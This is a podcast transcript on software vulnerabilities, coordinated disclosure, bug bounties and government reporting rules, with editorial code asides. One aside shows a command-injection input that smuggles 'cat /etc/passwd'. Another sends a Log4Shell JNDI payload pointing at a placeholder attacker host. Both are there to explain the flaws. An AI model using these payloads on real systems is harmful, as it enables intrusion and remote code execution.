Podcast: Can governments protect us from dangerous software bugs?

Transcript

Listen: We've probably all felt the slight annoyance at prompts we receive to update our devices. But these updates deliver vital patches to our software, protecting us from bad actors. Governments around the world are increasingly interested in monitoring when dangerous bugs are discovered as a means to protect citizens. But would such regulation have the intended effect?

In season 2, episode 5 of Patching the System, we focus on international efforts to bring peace and security online. In this episode, we look at how software vulnerabilities are discovered and reported, what government regulators can and can't do, and the strengths of a coordinated disclosure process, among other solutions.

Our participants are:

  • Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro
  • Serge Droz from the Forum of Incident Response and Security Teams (FIRST)
  • Ali Wyne, Eurasia Group Senior Analyst (moderator)

    GZERO’s special podcast series “Patching the System,” produced in partnership with Microsoft as part of the award-winning Global Stage series, highlights the work of the Cybersecurity Tech Accord, a public commitment from over 150 global technology companies dedicated to creating a safer cyber world for all of us.

    Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.

    TRANSCRIPT: Can governments protect us from dangerous software bugs?

    Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.

    DUSTIN CHILDS: The industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.

    SERGE DROZ: I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable.

    ALI WYNE: If you've ever gotten a notification pop up on your phone or computer saying that an update is urgently needed, you've probably felt that twinge of inconvenience at having to wait for a download or restart your device. But what you might not always think about is that these software updates can also deliver patches to your system, a process that is in fact where this podcast series gets its name.

    Today, we'll talk about vulnerabilities that we all face in a world of increasing interconnectedness.

    Welcome to Patching the System, a special podcast from the Global Stage Series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.

    And about those vulnerabilities that I mentioned before, we're talking specifically about the vulnerabilities in the wide range of IT products that we use, which can be entry points for malicious actors. And governments around the world are increasingly interested in knowing about these software vulnerabilities when they're discovered.

    Since 2021, for example, China has required that anytime such software vulnerabilities are discovered, they first be reported to a government ministry, even before the company that makes the technology is alerted to the issue. In the European Union, similar but less stringent legislation is pending that would require companies that discover that a software vulnerability has been exploited to report the information to government agencies within 24 hours, and to provide information on any mitigations used to correct the issue.

    These policy trends have raised concerns from technology companies and incident responders that such policies could actually undermine security.

    Joining us today to delve into these trends and explain why are Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm based in Japan, and Serge Droz from the Forum of Incident Response and Security Teams, aka FIRST, a community of IT security teams that respond when there's a major cyber crisis. Dustin, Serge, welcome to you both.

    DUSTIN CHILDS: Hello. Thanks for having me.

    SERGE DROZ: Hi. Thanks for having me.

    ALI WYNE: It's great to be talking with both of you today. Dustin, let me kick off the conversation with you. I tried in my introductory remarks to give listeners a quick glimpse of what it is we're talking about here, but give us some more detail. What exactly do we mean by vulnerabilities in this context, and where do they originate?

    DUSTIN CHILDS: Well, a vulnerability, really, when you break it down, is a flaw in software that could allow a threat actor to potentially compromise a target, and that's a fancy way of saying it's a bug. Vulnerabilities originate in humans, because humans are imperfect and they write imperfect code, so there's no software in the world that is completely bug-free, at least none that we've been able to generate so far. So every product, every program, given enough time and resources, can be compromised, because they all have bugs, they all have vulnerabilities in them. Now, a vulnerability doesn't necessarily mean that it can be exploited, but a vulnerability is something within a piece of software that potentially can be exploited by a threat actor, a bad guy.
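
    [To make that concrete, here is a minimal, hypothetical sketch of the kind of flaw Dustin describes: an ordinary coding shortcut that becomes a vulnerability the moment untrusted input can reach it. The example is illustrative only and not drawn from any real product.]

        # Hypothetical example: a classic command injection bug in Python.
        import subprocess

        def ping_host(hostname: str) -> str:
            # BUG: user input is handed to a shell unsanitized. An input like
            # "example.com; cat /etc/passwd" also runs the attacker's command.
            return subprocess.run(
                f"ping -c 1 {hostname}", shell=True, capture_output=True, text=True
            ).stdout

        def ping_host_fixed(hostname: str) -> str:
            # FIX: pass arguments as a list so no shell interprets the input.
            return subprocess.run(
                ["ping", "-c", "1", hostname], capture_output=True, text=True
            ).stdout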

    ALI WYNE: And Serge, when we're talking about the stakes here, obviously vulnerabilities can create cracks in the foundation that lead to cybersecurity incidents or attacks. What does it take for a software vulnerability to become weaponized?

    SERGE DROZ: Well, that really depends on the particular vulnerability. A couple of years ago, there was a vulnerability that was really super easy to exploit: Log4j. It was something that everybody could do in an afternoon, and that, of course, is a really big risk. If something like that gets public before it's fixed, we really have a big problem. Other vulnerabilities are much harder to exploit, also because software vendors, in particular operating system vendors, have invested a great deal in making it hard to exploit vulnerabilities on their systems. The easy ones are getting rarer, mostly because operating system companies are building countermeasures that make them hard to exploit. Others are a lot harder and need specialists, and that's why they fetch such a high price. So there is no general answer, but the trend is that it's getting harder, which is a good thing.
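
    [The easy-to-exploit vulnerability Serge refers to is Log4Shell (CVE-2021-44228) in the Log4j logging library. A rough sketch of why it could be exploited "in an afternoon": the entire attack was a short lookup string placed in any field a vulnerable Java server might log. The hostnames below are placeholders, not real systems.]

        import requests

        # The Log4Shell payload was just a JNDI lookup string. If a vulnerable
        # server logged any attacker-controlled field, such as the User-Agent
        # header, Log4j would fetch and execute code from the attacker's server.
        payload = "${jndi:ldap://attacker.example/a}"
        requests.get("https://target.example/", headers={"User-Agent": payload})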

    ALI WYNE: And Dustin, let me come back to you then. So who might discover these vulnerabilities first and what kinds of phenomena make them more likely to become a major security risk? And give us a sense of the timeline between when a vulnerability is discovered and when a so-called bad actor can actually start exploiting it in a serious way.

    DUSTIN CHILDS: The people who are discovering these are across the board. They're everyone from lone researchers just looking at things to nation states, really reverse engineering programs for their own purposes. So a lot of different people are looking at bugs, and it could be you just stumble across it too and it's like, "Oh, hey. Look, it's a bug. I should report this."

    So there's a lot of different people who are finding bugs. Not all of them are monetizing their research. Some people just report it. Some people will find a bug and want to get paid in one way or another, and that's what I do, is I help them with that.

    But then once it gets reported, depending on what industry you're in, it usually takes 120 days up to a year until it gets fixed by the vendor. But if a threat actor finds it and it can be weaponized, they can do that within 48 hours. So even if a patch is available and that patch is well-known, the bad guys can take that patch, reverse engineer it, and turn it into an exploit within 48 hours and start spreading. So within 30 days of a patch being made available, widespread exploitation is not uncommon if a bug can be exploited.

    ALI WYNE: Wow. So 48 hours, that doesn't give folks much time to respond, but thank you, Dustin, for giving us that number. I think we now have at least some sense of the problem and its scale, and we'll talk about prevention and solutions in a bit. But first, Serge, I want to come back to you and go into some more detail about the reporting process. What are the best practices in terms of reporting these vulnerabilities that we've been discussing today? I mean, suppose I were to discover a software vulnerability, for example. What should I do?

    SERGE DROZ: This is a really good question, and there's still a lot of ongoing debate, even though the principles are actually quite clear. If you find a vulnerability, your first step should be to confidentially inform the vendor, whoever is responsible for the software product.

    But that actually sounds easier than it is, because quite often it's hard to talk to a vendor. There are still some companies out there that don't talk to 'hackers,' in inverted commas. That's really bad practice. In this case, I recommend that you contact a national agency that you trust that can mediate between you. And that's all fairly easy to do if it's just between you and another party, but then you have a lot of vulnerabilities in products for which no one is really responsible, take open source, or components that are used inside many other products.

    So we're talking about supply chain issues, and then things really become messy. In these cases, I really recommend that people start working together with someone who's experienced in doing coordinated vulnerability disclosure. Quite often what happens is that, within the industry, affected organizations get together and form a working group that silently starts mitigating the issue. Best practice is that you give the vendor three months or more to actually be able to fix a bug, because sometimes it's not that easy. What you really should not be doing is leaking any kind of information. Even saying, "Hey, I have found a vulnerability in product X," may actually trigger someone to start looking at it. So it's really important that this remains a confidential process in which very few people are involved.

    ALI WYNE: So one popular method of uncovering these vulnerabilities that we've been discussing involves so-called bug bounty programs. What are bug bounty programs? Are they a good tool for catching and reporting these vulnerabilities? And then, moving beyond bug bounty programs, are there other tools that work when it comes to reporting vulnerabilities?

    SERGE DROZ: Bug bounty programs are just one of the tools we have in our tool chest to actually find vulnerabilities. The idea behind a bounty program is that you have a lot of researchers who poke at code just because they may be interested, and as the company or producer of the software, you offer them a bounty, some money. If they report a vulnerability responsibly, you pay them, usually depending on how severe or how dangerous the vulnerability is, and you encourage good behavior this way. I think it's a really great approach because it actually creates a lot of diversity. Typically, bug bounty programs attract a lot of different types of researchers, so you have different ways of looking at your code, and that often uncovers vulnerabilities that no one has ever thought of, because no one really had that way of thinking. So I think it's a really good thing.

    It also rewards people who responsibly disclose and don't just sell to the highest bidder, because we do have companies out there that buy vulnerabilities that then end up in some strange gray market, exactly what we don't want. So I think that's a really good thing. Bug bounty programs are complementary to what we call penetration testing, where you hire a company that, for money, starts looking at your software. There's no guarantee that they find a bug, but they usually have a systematic way of going over it, and you have an agreement. As I said, I don't think there's a single silver bullet, a single way to do this, but I think this is a great way to reward responsible disclosure. And some of the bug bounty researchers make a lot of money. They actually make a living off it. If you're really good, you can make a decent amount of money.
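
    [A purely hypothetical sketch of how a program might tie payouts to severity, as Serge describes. The tiers follow the standard CVSS v3 severity bands, but the dollar amounts are invented for illustration; real programs publish their own schedules.]

        def bounty_for(cvss_score: float) -> int:
            """Map a CVSS v3 base score (0.0-10.0) to an illustrative payout in dollars."""
            if cvss_score >= 9.0:   # Critical
                return 10_000
            if cvss_score >= 7.0:   # High
                return 4_000
            if cvss_score >= 4.0:   # Medium
                return 1_000
            return 150              # Low

        print(bounty_for(9.8))  # e.g., an unauthenticated remote code execution bug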

    DUSTIN CHILDS: Yeah, and let me just add on to that as someone who runs a bug bounty program. There are a couple of different types of bug bounty programs too, and the most common one is the vendor specific one. So Microsoft buys Microsoft bugs, Apple buys Apple bugs, Google buys Google bugs. Then there's the ones that are like us. We're vendor-agnostic. We buy Microsoft and Apple and Google and Dell and everything else pretty much in between.

    And one of the biggest things that we do as a vendor-agnostic program is an individual researcher might not have a lot of sway when they contact a big vendor like a Microsoft or a Google, but if they come through a program like ours or other vendor-agnostic programs out there, they know that they have the weight of the Zero Day Initiative or that program behind it, so when the vendor receives that report, they know it's already been vetted by a program and it's already been looked at. So it's a little bit like giving them a big brother that they can take to the schoolyard and say, "Show me where the software hurt you," and then we can help step in for that.

    ALI WYNE: And Dustin, you've told us what bug bounty programs are. Why would someone want to participate in that program?

    DUSTIN CHILDS: Well, researchers have a lot of different motivations, whether it's curiosity or just trying to get stuff fixed, but it turns out money is a very big motivator pretty much across the spectrum. We all have bills to pay, and a bug bounty program is a way to get something fixed and earn a potentially large amount of money, depending on the type of bug that you have. The bugs I deal with range anywhere from $150 on the very low end up to $15 million for the most severe zero-click iPhone exploits being purchased by governments, that type of thing, so there are all points in between too. So it's potentially lucrative if you find the right types of bugs, and we do have people who are exclusively bug hunters throughout the year, and they make a pretty good living at it.

    ALI WYNE: Duly noted. So maybe I'm playing a little bit of a devil's advocate here, but if these cyber vulnerabilities usually arise from errors in code or other technology mistakes by companies, aren't they principally a matter of industry responsibility? And wouldn't the best prevention just be to regulate software development more tightly and keep these mistakes from getting out into the world in the first place?

    DUSTIN CHILDS: Oh, you used the R word. Regulation, that's a big word in this industry. So obviously it's less expensive to fix bugs in software before it ships than after it ships. So yes, obviously it's better to fix these bugs before they reach the public. However, that's not really realistic, because like I said, every piece of software has bugs, and you could spend a lifetime testing and testing and testing and never root them all out, and then never ship a product. So the industry right now is definitely looking to ship product. Can they do a better job? I certainly think they can. I spend a lot of money buying bugs, and some of them I'm like, "Ooh, that's a silly bug that should never have shipped." So absolutely, the industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.

    ALI WYNE: Obviously there isn't any silver bullet when it comes to managing these vulnerabilities, disclosing these vulnerabilities. So assuming that we probably can't eliminate all of them, how should organizations deal with fixing these issues when they're discovered? And is there some kind of coordinated vulnerability disclosure process that organizations should follow?

    DUSTIN CHILDS: There is a coordinated disclosure process. I mean, I've been in this industry for 25 years and dealing with vulnerability disclosures since 2008 personally, so this is a well-known process. As an industry, if you're developing software, one of the most important things you can do is make sure you have a contact. If someone finds a bug in your program, who do they email? With the more established programs like Microsoft and Apple and Google, it's very clear, if you find a bug there, who you're supposed to email and what you're supposed to do with it. One of the problems we have as a bug bounty program is that if we purchase a bug in a lesser-known piece of software, sometimes it's hard for us to hunt down who actually is responsible for maintaining and updating it.

    We've even had to go on Twitter and LinkedIn to try and hunt down people to respond to an email saying, "Hey, we've got a bug in your program." So one of the biggest things you can do is just be prepared for the fact that somebody could report a bug to you. As a consumer of the product, however, you need a patch management program. You can't just rely on automatic updates. You can't just rely on things happening automatically or easily. You need to understand first what is in your environment, so you have to be ruthless in your asset discovery, and I use the word ruthless there intentionally. You've got to know what is in your enterprise to be able to defend it, and then you've got to have a plan for managing it and patching it. That's a lot easier said than done, especially in a modern enterprise where you don't just have desktops and laptops; you've got IT devices, you've got IoT devices, you've got thermostats, you've got little screens everywhere that need updating, and they all have to be included in that patch management process.
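
    [One widely used convention for Dustin's "make sure you have a contact" advice is a security.txt file (RFC 9116), served at /.well-known/security.txt, which tells researchers exactly where to send a report. A minimal example with placeholder addresses:]

        Contact: mailto:security@example.com
        Expires: 2026-12-31T23:59:59Z
        Encryption: https://example.com/pgp-key.txt
        Policy: https://example.com/vulnerability-disclosure-policy
        Preferred-Languages: en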

    ALI WYNE: Serge, when it comes to triaging vulnerabilities, it doesn't sound like there's a large need for government participation. So what are some of the reasons, legitimate and maybe less than legitimate, why governments might increasingly want to be notified about vulnerabilities even before patches are available? What are their motivations?

    SERGE DROZ: So I think there are several different motivations. Governments are getting increasingly fed up with the kinds of excuses that our industry, the software industry, makes about how hard it is to avoid software vulnerabilities, all the reasons and excuses we bring for not doing our jobs. And frankly, as Dustin said, we could be doing better. Governments just want to know so they can send the message that, "Hey, we're watching you and we want to make sure you do your job." Personally, I'm not really convinced this is going to work. So those would be the mostly legitimate reasons why governments want to know about vulnerabilities. I think it's fair that the government knows or learns about a vulnerability after the fact, just to get an idea of what the risk is for the entire industry. Personally, I feel that only the parties that need to know should know about it during the responsible disclosure process.

    And then of course, there are governments that like vulnerabilities because they can abuse them themselves. I mean, governments are known to exploit vulnerabilities through their favorite three-letter agencies. That's actually quite legitimate for governments to do; it's not illegal for governments to do this type of work. But of course, as a consumer or as an end user, I don't like this. I don't want products with vulnerabilities that are being exploited. And personally, from a civil society point of view, there's just too much risk with this being out there. So my advice really is: the fewer people and the fewer organizations that know about a vulnerability, the better.

    DUSTIN CHILDS: What we've been talking about a lot so far is what we call coordinated disclosure, where the researcher and the vendor coordinate a response. When you start talking about governments, though, you start talking about non-disclosure, and that's when people hold onto these bugs and don't report them to the vendor at all, and the reason they do that is so that they can use them exclusively. So that is one reason why governments hold onto these bugs and want to be notified: so that they have a chance to use them against their adversaries, or against their own populations, before anyone else can use them or even before they get fixed.

    ALI WYNE: So the Cybersecurity Tech Accord recently released a statement opposing the kinds of reporting requirements we've been discussing. From an industry perspective, what are the concerns when it comes to reporting vulnerabilities to governments?

    DUSTIN CHILDS: Really the biggest concern is making sure that we all have an equitable chance to get it fixed before it gets used. If a single government starts exploiting vulnerabilities for its own gain, whatever that may be, that puts the rest of the world at a disadvantage, and that's the rest of the world: its allies as well as its opponents. So we want to do coordinated disclosure. We want to get the bugs fixed in a timely manner, and keeping them to themselves really discourages that. It discourages finding bugs, it discourages reporting bugs. It really discourages vendors from fixing bugs too, because if the vendors know that governments are just going to be using these bugs, they might get a phone call from their friendly neighborhood three-letter agency saying, "You know what? Hold off on fixing that for a while." Again, it just puts us all at risk, and we saw this with Stuxnet.

    Stuxnet was a tool developed by governments, targeting another government. It was targeting Iranian nuclear facilities, and it did do damage to Iranian nuclear facilities, but it also did a lot of collateral damage throughout Europe as well, and that's what we're trying to avoid. If it's a government-on-government thing, great, that's what governments do, but we're trying to minimize the collateral damage to everyone else who gets hurt by this, and there really were a lot of other places that were impacted negatively by Stuxnet.

    ALI WYNE: And Serge, what would you say to someone who might respond to the concerns that Dustin has raised by saying, "Well, my government is advanced and capable enough to handle information about vulnerabilities responsibly and securely, so there's no issue or added risk in reporting to them." What would you say to that individual?

    SERGE DROZ: The point is that there are certain things you really only deal with on a need-to-know basis. That's something governments actually understand. When governments deal with confidential or critical information, it's always on a need-to-know basis. They don't tell every government employee, even though those employees are, of course, loyal. Wider sharing makes the risk of this leaking bigger, even if the government doesn't have any ill intent, so there's just no need, the same way there is no need for all the other hundred thousand security researchers to know about this. So I think as long as you cannot contribute constructively to mitigating the vulnerability, you should not be part of that process.

    Having said that, though, there are some governments that have really tried hard to help researchers make contact with vendors. Some researchers are afraid to report vulnerabilities because they feel they're going to come under pressure, or things like that. So if a government wants to take that role and can create enough trust that researchers trust it, I don't really have a problem, but it should not be mandatory. Trust needs to be earned. You cannot legislate this, and every time you have to legislate something, I mean, come on, you legislate it because people don't trust you.

    ALI WYNE: We've spent some time talking about vulnerabilities and why they're a problem. We've discussed some effective and maybe some not-so-effective ways to prevent or manage them better. And I think governments have a legitimate interest in knowing that companies are acting responsibly, and that interest is the impetus behind at least some of the push for more regulation and reporting. But what does each of you see as other ways that governments could help ensure that companies are mitigating risks and protecting consumers as much as possible?

    DUSTIN CHILDS: So one of the things that we're involved with here at the Zero Day Initiative is encouraging governments to allow safe harbor. What that really means is that researchers can safely report vulnerabilities to a vendor without the legal threat of being sued or having other action taken against them, so that, as long as they are legitimate researchers legitimately reporting a bug, not trying to steal data or violate laws, just trying to get something fixed, they're able to do that without facing legal consequences.

    One of the biggest things that we do as a bug bounty program is just handle the communications between researchers and the vendors, and that is really where it can get very contentious. So to me, one of the things governments can do to help is make sure that safe harbor is allowed, so that researchers know, "I can report this vulnerability to this vendor without getting in touch with a lawyer first. I'm just here trying to get something fixed. Maybe I'm trying to get paid as well." So maybe there is some monetary value in it, but really they're just trying to get something fixed. They're not trying to extort anyone, they're not trying to create havoc, they're just trying to get a bug fixed, and that safe harbor would be very valuable for them. That's one thing we're working on with our government contacts, and I think it's a very big thing for the industry to take up as well.

    SERGE DROZ: Yes, I concur with Dustin. I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable. That also includes a regulatory framework that gets away from this blaming. I mean, writing software is hard; bugs appear. If you just constantly keep bashing people for not doing it right, or you threaten them with liability, they're not going to talk to you about these types of things. So I think the job of the government is to encourage responsible behavior and to create an environment for that. And maybe there are always going to be a couple of black sheep, and here maybe the role of the government is really to encourage them to play along and start offering vulnerability reporting programs. That's where I see the role of the government: creating good governance to actually enable responsible vulnerability disclosure.

    ALI WYNE: Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm based in Japan. And Serge Droz from the Forum of Incident Response and Security Teams, a community of IT security teams that respond when there is a major cyber crisis. Dustin, Serge, thanks very much for joining me today.

    DUSTIN CHILDS: You're very welcome. Thank you for having me.

    SERGE DROZ: Yes, same here. It was a pleasure.

    ALI WYNE: That's it for this episode of Patching the System. We have five episodes this season covering everything from cyber mercenaries to a cybercrime treaty, so follow Ian Bremmer's GZERO World feed anywhere you get your podcasts to hear more. I'm Ali Wyne. Thanks very much for listening.
